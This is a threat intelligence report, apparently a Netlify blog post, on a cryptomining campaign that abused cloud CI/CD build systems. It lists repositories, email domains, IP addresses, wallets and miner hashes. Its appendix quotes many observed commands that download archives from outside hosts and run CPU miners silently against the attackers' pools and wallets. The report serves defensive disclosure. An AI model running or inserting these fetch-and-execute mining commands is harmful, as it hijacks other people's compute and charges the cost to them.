In recent months, the threat intelligence team at Netlify has observed an abusive cryptominer campaign targeting the SaaS industry. The aim of the campaign has been to mine cryptocurrencies optimized for CPU-based mining by abusing cloud SaaS infrastructure. The goal of this report is to share details about the observed campaign to the wider information security community, so companies can enhance their defenses against such abuse. Netlify is committed to uncovering threats that affect the wider industry. Our hope is that the protections we employ to secure our customers’ data will be used by our partners and colleagues throughout the industry to make the web a safer place for all. ## Campaign timeframe The cryptomining campaign discussed in this report was found to be operating in several waves of activity, the first ramping up slowly throughout September 2024, peaking and pausing around the beginning of October. Several waves of quicker rampups were observed beginning mid-October into early-November, ceasing completely around November 10, 2024. Based on the wallet addresses associated with the campaign (discussed below), activity from this campaign has likely occurred in some form since July 2021, with a larger spike in activity seen throughout 2023 and 2024. ## An evolving campaign During the recently observed waves of the campaign, seven repositories have been used to download and execute cryptomining binaries on target systems. Over the course of the campaign the execution stages evolved several times, likely in an attempt to evade detection. Ultimately, execution has consisted of downloading a cryptominer binary and running said binary with parameters pointed to one of seven wallets and four IPv4 addresses associated with the campaign. During the recent waves of activity, mining was centered around TideCoin, later shifting to VerusCoin. Execution payloads have varied from one to three stages throughout the observed campaign. The following illustration describes at a high level the campaign’s execution strategy. A detailed description of all discovered execution stages and variations are included in the appendix of this report. ![Illustration describing at a high level the campaign’s execution strategy](https://cdn.sanity.io/images/o0o2tn5x/production/471a6cb360dff64ea2ac8d5d2f94be975d9b4cbe-910x854.png) ## Associated email address and domains Analysis has uncovered more than 3200 email addresses associated with the cryptominer campaign. Less than 250 of these addresses were associated with GMail and Office 365 email addresses, with the majority of email addresses being associated with six custom domain names. Detail of these domains is included in the appendix of this report. Email addresses used for account signups used the pattern \`prefix\`+\`random\_string\`@\`domain\`\[.\]\`com\`. The plus sign (+) is a common sub-addressing method supported by many email providers, allowing for multiple unique email addresses that act as extensions of the primary email address. In total, 46 unique email addresses were used to generate the approximately 3200 sub-addressed email addresses. It is assumed that multiple accounts were attempted for creation to produce greater concurrent CPU mining capacity. Activity associated with these email addresses has originated from a variety of IP address blocks, with 74% being associated with various cloud providers and 64% being associated with Microsoft cloud networks. The following table describes the organizational ownership of IP address blocks discovered to be originating traffic for the abusive email addresses. Organization Account signup occurrences Microsoft 2442 Pt Telkom Indonesia 383 Protonvpn 64 Datacamp 60 OVH 16 Leaseweb 13 Other 274 ## How successful has their campaign against the industry been? A total of seven active wallets were used in the campaign, with mining activities focused on [VerusCoin](https://verus.io/), [TideCoin](https://tidecoin.org/), and [Sugarchain](https://sugarchain.org/), all of which are cryptocurrencies designed to be mined on CPU-based hardware. An eighth wallet was also identified in the format of a VerusCoin blockchain hash, but its address could not be found on the VerusCoin blockchain explorer. In total across the lifetime of all wallets, around $6,500 in cryptocurrency was mined, based on the conversion rates at the time of this writing in December 2024. It is estimated, based on the activity volume of these wallets, that it may cost upwards of $20,000 - $30,000 a month in cloud spend, during months when the campaign was active. That total represents wasted spend across all victims targeted in this cryptomining campaign. Since many cloud platforms offer various free-tier plans with access to some level of cloud compute resources, the compute cost to the abusive campaign is likely close to $0. A summary of the wallets discovered are as follows: Wallet Coin Earliest transaction Total balance transfers \* USD equivalent \* [RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii](https://explorer.verus.io/address/RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii) VerusCoin 2021-07-21 127.40519181 VRSC $806.47 [RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c](https://explorer.verus.io/address/RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c) VerusCoin 2023-09-10 429.83822009 VRSC $2,720.88 [RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs](https://explorer.verus.io/address/RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs) VerusCoin 2024-10-13 0.00293549 VRSC $0.02 [TWmRFcspf257KLgehukxHPdc1pf6g8PDz9](https://explorer.tidecoin.org/address/TWmRFcspf257KLgehukxHPdc1pf6g8PDz9) TideCoin 2023-03-10 9214.75307631 TDC $1,773.41 [TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW](https://explorer.tidecoin.org/address/TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW) TideCoin 2024-10-02 1446.54011315 TDC $278.39 [sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp](https://sugar.wtf/#/address/sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp) SugarChain 2024-07-21 1326346.16288581 SUGAR $346.27 [sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj](https://sugar.wtf/#/address/sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj) SugarChain 2024-10-26 2226232.43760123 SUGAR $581.20 _\* The total wallet balance transfers and USD rate conversions may change over time._ ## Conclusion This report discusses a cryptominer campaign aimed at abusing cloud compute resources. This particular campaign appears to have been active as early as 2021, with a large uptick in activity taking place throughout 2023 and 2024. Following this conclusion, additional technical details about the campaign are provided as a resource to information security teams tasked with defending against such abuse. Questions about this report can be directed to [Netlify Security](https://www.netlify.com/security) at [security@netlify.com](mailto:security@netlify.com). ## Appendix: Additional technical details ### Repositories associated with the cryptominer campaign Repository Occurrences observed bitbucket\[.\]org/betbeyw/titied 163,225 gitlab\[.\]com/mantap7091041/node 129,570 bitbucket\[.\]org/awrbtaehtaey/bluise 19,304 gitlab\[.\]com/mantap7091041/gas 5,731 bitbucket\[.\]org/oaebthoae/bluise 4,367 gitlab\[.\]com/mantap7091041/nodejs 487 bitbucket\[.\]org/dtmdtn/bluise 45 ### Email domains used in the cryptominer campaign Email domain Occurrences observed Domain registrar Domain registration date butyusa\[.\]com 1517 Hostinger 2023-05-23 gyuil\[.\]com 801 WebNIC 2024-02-04 gimaul\[.\]com 343 WebNIC 2024-01-31 qmaul\[.\]com 247 IDWebHost 2023-12-25 gmail\[.\]com 211 n/a n/a zaknim\[.\]com 45 Hostinger 2023-07-17 outlook\[.\]com 29 n/a n/a gsweety\[.\]com 7 WebNIC 2024-01-26 ### IPv4 addresses associated with the cryptominer campaign IPv4 address ASN Location 8.215.4.141 AS45102 Alibaba (US) Technology Co., Ltd. Jakarta, Indonesia 8.219.2.132 AS45102 Alibaba (US) Technology Co., Ltd. Jakarta, Indonesia 47.236.252.96 AS45102 Alibaba (US) Technology Co., Ltd. Singapore 178.128.218.13 AS14061 DigitalOcean, LLC Singapore ### Cryptominer binaries used in the campaign Binary Coin SHA1 Identifier hell VerusCoin 86cdddf21f0b3071dcff753fd9db19012fd132f6 \---------------------------------------------------------------------- Hellminer 0.59.1 \[VerusHash 2.2 + PBaaS\] Linux ---------------------------------------------------------------------- capeu TideCoin 3b8821981d55d791b0283098c7c827450f69ce19 \*\*\*\*\*\*\*\*\*\* cpuminer-rplant 5.0.36L-sse2 \*\*\*\*\*\*\*\*\*\*\* cjava TideCoin d7445ca0d10b6a89cf6eeaf056081bc7daf18d26 \*\*\*\*\*\*\*\*\*\* cpuminer-rplant 5.0.27L-avx2 \*\*\*\*\*\*\*\*\*\*\* sumaker SugarChain 5b1855a378dfba329d60764788d52eba556545c7 \*\*\* sugarmaker 2.5.0-sugar4 by Kanon \*\*\* Multi-threaded CPU miner for Sugarchain and other Yespower variants ### Detailed view of the execution stages used in the cryptominer campaign #### Repository: git@bitbucket\[.\]org:awrbtaehtaey/bluise **Date Range:** 2024-11-05 to 2024-11-08 **Associated Wallets:** - RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii - RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c **Coins Mined:** - VerusCoin **Endpoints:** - stratum+tcp://8.219.2.132:80 ##### Execution Variations ###### _Variation A_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official > /dev/null 2>&1 && yarn generate ``` **Stage 2:** Source: ./official **Commands observed:** ``` >> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all) ``` ###### _Variation B_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node info.js && yarn generate>> yarn generate && node info.js>> node info.js ``` **Stage 2:** Source: node info.js **Commands observed:** ``` >> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 1m ./official>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official ``` **Stage 3:** Source: ./official **Commands observed:** ``` >> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all) ``` ###### _Variation C_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node info.js>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1 ``` **Stage 2:** Source: node info.js **Commands observed:** ``` >> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1 ``` **Stage 3:** Source: ./nano **Commands observed:** ``` >> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all) ``` #### Repository: git@bitbucket\[.\]org:oaebthoae/bluise **Date Range:** 2024-11-05 to 2024-11-08 **Associated Wallets:** - RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii - RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c **Coins Mined:** - VerusCoin **Endpoints:** - stratum+tcp://8.219.2.132:80 ##### Execution Variations ###### _Variation A_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official > /dev/null 2>&1 && yarn generate ``` **Stage 2:** Source: ./official **Commands observed:** ``` >> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all) ``` ###### _Variation B_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node info.js && yarn generate>> yarn generate && node info.js>> node info.js ``` **Stage 2:** Source: node info.js **Commands observed:** ``` >> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 1m ./official>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official ``` **Stage 3:** Source: ./official **Commands observed:** ``` >> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all) ``` ###### _Variation C_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node info.js ``` **Stage 2:** Source: node info.js **Commands observed:** ``` >> wget -q https://bitbucket.org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1>> wget -q https://bitbucket.org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1 ``` **Stage 3:** Source: ./nano **Commands observed:** ``` >> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all) ``` #### Repository: git@bitbucket\[.\]org:betbeyw/titied **Date Range:** 2024-10-22 to 2024-11-05 **Associated Wallets:** - RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c - RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii - sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj - TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW **Coins Mined:** - SugarChain - TideCoin - VerusCoin **Endpoints:** - 178.128.218.13:80 - stratum+tcp://8.215.4.141:443 - stratum+tcp://8.219.2.132:80 ##### Execution Variations ###### _Variation A_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> npm run build && ./next>> npm run build && chmod +x next && ./next>> chmod +x next && ./next ``` **Stage 2:** Source: ./next **Commands observed:** - Bash script: ``` wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gzecho ""Downloaded sumaker""tar -xf titied.tar.gzecho ""Running sumaker for 2 minutes""timeout 10m ./gas > /dev/null 2>&1echo ""sumaker finished, starting npm run build""npm run build" ``` **Stage 3:** Source: ./gas **Commands observed:** ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all) ``` ###### _Variation B_ **Stage 1:** Source: CI/CD ``` >> node data.js ``` **Stage 2:** Source: node data.js ``` >> wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz && tar -xf titied.tar.gz && timeout 10m ./gas > /dev/null 2>&1 ``` **Stage 3:** Source: ./gas ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all) ``` ###### _Variation C_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node data.js ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> wget -q https://gitlab[.]com/maximus.sale1/file/-/raw/main/sumaker.tar.gz && tar -xf sumaker.tar.gz && timeout 10m ./gas > /dev/null 2>&1 ``` **Stage 3:** Source: ./gas **Commands observed:** ``` >> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj.lol -t $(nproc --all) ``` ###### _Variation D_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node data.js ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1 ``` **Stage 3:** Source: ./nano **Commands observed:** ``` >> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all) ``` ###### _Variation E_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node data.js && npm run build ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz && tar -xf titied.tar.gz && timeout 15m ./gas > /dev/null 2>&1 ``` **Stage 3:** Source: ./gas **Commands observed:** ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all) ``` ###### _Variation F_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node data.js && npm run build ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1 ``` **Stage 3:** Source: ./nano **Commands observed:** ``` >> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all) ``` ###### _Variation G_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node data.js && npm run build ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all) > /dev/null 2>&1'; ``` ###### _Variation H_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> npm run build && node data.js ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> wget -q https://x0.at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official ``` **Stage 3:** Source: ./official **Commands observed:** ``` >> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all) ``` #### Repository: git@gitlab\[.\]com:mantap7091041/nodejs **Date Range:** 2024-09-27 to 2024-11-04 **Associated Wallets:** - R9sx8KeC2qeGfpvC4GXiXoxkA5KEYE7wYU - RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs - sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp - TWmRFcspf257KLgehukxHPdc1pf6g8PDz9 **Coins Mined:** - SugarChain - TideCoin - VerusCoin **Endpoints:** - 47.236.252.96:443 - 178.128.218.13:80 - stratum+tcp://8.215.4.141:80 - stratum+tcp://8.215.4.141:443 - stratum+tcp://8.219.2.132:80 ##### Execution Variations ###### _Variation A_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1 ``` ###### _Variation B_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all) ``` ###### _Variation C_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1 ``` ###### _Variation D_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1 ``` **Stage 2:** Source: ./gas **Commands observed:** ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all) ``` ###### _Variation E_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1 ``` **Stage 2:** Source: ./gas **Commands observed:** ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all) ``` ###### _Variation F_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node data.js ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> wget https://gitlab[.]com/mantap7091041/gas/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1 ``` **Stage 3:** Source: ./gas **Commands observed:** ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all) ``` ###### _Variation G_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node data.js ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1 ``` **Stage 3:** Source: ./gas **Commands observed:** ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all) ``` ###### _Variation H_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node data.js ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./hell -c stratum+tcp://8.219.2.132:80 -u R9sx8KeC2qeGfpvC4GXiXoxkA5KEYE7wYU.yesss -p x --cpu $(nproc --all) > /dev/null 2>&1 ``` #### Repository: git@gitlab\[.\]com:mantap7091041/node **Date Range:** 2024-09-27 to 2024-10-28 **Associated Wallets:** - RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs - sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp - TWmRFcspf257KLgehukxHPdc1pf6g8PDz9 **Coins Mined:** - SugarChain - TideCoin - VerusCoin **Endpoints:** - 47.236.252.96:443 - 178.128.218.13:80 - stratum+tcp://8.215.4.141:80 - stratum+tcp://8.215.4.141:443 ##### Execution Variations ###### _Variation A_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1 ``` ###### _Variation B_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all) ``` ###### _Variation C_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1 ``` ###### _Variation D_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1 ``` **Stage 2:** ./gas **Commands observed:** ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all) ``` ###### _Variation E_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> node data.js ``` **Stage 2:** Source: node data.js **Commands observed:** ``` >> unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1 ``` **Stage 3:** Source: ./gas **Commands observed:** ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all) ``` #### Repository: git@gitlab\[.\]com:mantap7091041/gas **Date Range:** 2024-09-27 to 2024-10-26 **Associated Wallets:** - RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs - sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp - TWmRFcspf257KLgehukxHPdc1pf6g8PDz9 **Coins Mined:** - SugarChain - TideCoin - VerusCoin **Endpoints:** - 47.236.252.96:443 - 178.128.218.13:80 - stratum+tcp://8.215.4.141:80 - stratum+tcp://8.215.4.141:443 ##### Execution Variations ###### _Variation A_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1 ``` ###### _Variation B_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all) ``` ###### _Variation C_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1 ``` ###### _Variation D_ **Stage 1:** Source: CI/CD **Commands observed:** ``` >> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1 ``` **Stage 2:** Source: ./gas ``` >> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all) ``` ### Share - [X (fka Twitter)](https://twitter.com/intent/tweet?text=Netlify Threat Intelligence Brief: Anatomy of an Abusive Cryptominer Campaign&url=https://www.netlify.com/blog/netlify-threat-intelligence-brief-anatomy-of-an-abusive-cryptominer-campaign/) - [LinkedIn](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww.netlify.com%2Fblog%2Fnetlify-threat-intelligence-brief-anatomy-of-an-abusive-cryptominer-campaign%2F) - [Facebook](https://www.facebook.com/sharer.php?u=https://www.netlify.com/blog/netlify-threat-intelligence-brief-anatomy-of-an-abusive-cryptominer-campaign/) - [Bluesky](https://bsky.app/intent/compose?text=Netlify Threat Intelligence Brief: Anatomy of an Abusive Cryptominer Campaign+https://www.netlify.com/blog/netlify-threat-intelligence-brief-anatomy-of-an-abusive-cryptominer-campaign/) * * * ### Tags - [Security](/blog/tags/security/) - [Threat Intelligence](/blog/tags/threat-intelligence/) - [Cryptomining](/blog/tags/cryptomining/) ## Keep reading ![](/_astro/eb275ddb9290b947ba4c53ac30538c77b44edae9-720x405_1y2MXK.webp) News & Announcements June 25, 2026 [ ### Netlify Functions, designed for Agent Experience ](/blog/netlify-functions-designed-for-agent-experience) - ![Profile picture of Eduardo Bouças](/_astro/52958f21e8450baf6d8e60302341a984e220c0cd-512x512_13VDlu.webp) Eduardo Bouças ![](/_astro/d20f9f717bbdd511f73ee138be4114ff13f480f9-2400x1350_1fe4aq.webp) News & Announcements June 24, 2026 [ ### How we measure Netlify’s Agent Experience ](/blog/how-we-measure-netlify-agent-experience) - ![Profile picture of Sean Roberts](/_astro/bbf2243f8171dbddd80ab2103622106cef84d125-512x512_Z1d2LKE.webp) Sean Roberts ## Recent posts News & Announcements June 25, 2026 [ ### Netlify Functions, designed for Agent Experience ](/blog/netlify-functions-designed-for-agent-experience) - ![Profile picture of Eduardo Bouças](/_astro/52958f21e8450baf6d8e60302341a984e220c0cd-512x512_13VDlu.webp) Eduardo Bouças News & Announcements June 24, 2026 [ ### How we measure Netlify’s Agent Experience ](/blog/how-we-measure-netlify-agent-experience) - ![Profile picture of Sean Roberts](/_astro/bbf2243f8171dbddd80ab2103622106cef84d125-512x512_Z1d2LKE.webp) Sean Roberts Guides & Tutorials May 15, 2026 [ ### How to build a real-time AI chatbot in minutes with Netlify Agent Runners (no backend) ](/blog/how-to-build-a-real-time-ai-chatbot-in-minutes-with-netlify-agent-runners-no-backend) - ![Profile picture of Nahrin Jalal](/_astro/f0e7c8f227a03fe58340c99ef5439d5a896c0733-272x272_Z23kDpD.webp) Nahrin Jalal ![](/_astro/3f255b372fa958df35802666ee33b4609b2d71bd-1200x1586_1VtE2D.webp) ### How do the best dev and marketing teams work together? [Access the report](https://www.netlify.com/reports/2024-leadership-trend-report/access/)